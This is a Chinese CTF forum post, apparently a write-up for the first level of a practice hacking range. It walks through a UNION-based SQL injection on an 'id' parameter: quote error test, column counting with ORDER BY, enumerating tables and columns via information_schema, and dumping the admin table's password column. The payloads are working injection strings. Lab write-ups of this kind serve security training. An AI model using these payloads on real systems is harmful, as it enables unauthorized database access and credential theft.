【蓝胖】靶场第一章小芳的writeup

菜刀也是刀   ·   发表于 2018-07-25 14:10:03   ·   CTF&WP专版

这个猫好可爱啊~  以后我也养一只

天才第一步,判断有没有注入,如下图,加个  ’ 报错

1 and 1=1 正确

猜表长度,最后猜到2正确 order by 

把id设为2,前面出错,猜数据库名 id=2 union select 1,database()   

爆出数据库中所有的表:

/?id=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() 


爆出当前表:id=2 union select 1,table_name from information_schema.tables where table_schema = database() 


这时候有了表名,库名,再去爆出所有列,(*^▽^*)

2 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'admin' 

嘿嘿,有3列,看password列吧

?id=2 union select 2,password from admin 

得到一串神秘的英文单词,居然不是肥猫的名字,算了,去试试是不是秘钥吧!


大家有什么其他方法,欢迎留言讨论~~


打赏我,让我更有动力~

0 条回复   |  直到 2018-7-25 | 1361 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.